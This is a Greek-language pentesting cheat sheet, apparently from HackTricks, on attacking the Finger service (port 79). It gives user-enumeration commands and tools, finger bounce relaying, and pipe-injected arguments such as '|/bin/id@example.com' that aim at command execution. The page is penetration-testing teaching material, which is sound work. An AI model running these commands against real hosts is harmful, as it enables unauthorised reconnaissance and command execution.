# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **Βασικές Πληροφορίες** Το πρόγραμμα/υπηρεσία **Finger** χρησιμοποιείται για την ανάκτηση λεπτομερειών σχετικά με τους χρήστες υπολογιστών. Συνήθως, οι πληροφορίες που παρέχονται περιλαμβάνουν το **όνομα σύνδεσης του χρήστη, το πλήρες όνομα** και, σε ορισμένες περιπτώσεις, επιπλέον λεπτομέρειες. Αυτές οι επιπλέον λεπτομέρειες μπορεί να περιλαμβάνουν την τοποθεσία του γραφείου και τον αριθμό τηλεφώνου (αν είναι διαθέσιμος), την ώρα που ο χρήστης συνδέθηκε, την περίοδο αδράνειας (idle time), την τελευταία φορά που διαβάστηκε το email από τον χρήστη και το περιεχόμενο των αρχείων σχεδίου και έργου του χρήστη. **Προεπιλεγμένη θύρα:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Καταμέτρηση** ### **Λήψη Πανό/Βασική σύνδεση** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Καταμέτρηση χρηστών** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Εναλλακτικά, μπορείτε να χρησιμοποιήσετε το **finger-user-enum** από [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), μερικά παραδείγματα: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap εκτελεί ένα σενάριο για να χρησιμοποιήσει τα προεπιλεγμένα σενάρια** ### Το Metasploit χρησιμοποιεί περισσότερα κόλπα από το Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## Εκτέλεση εντολών ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Χρησιμοποιήστε ένα σύστημα ως δρομολογητή finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}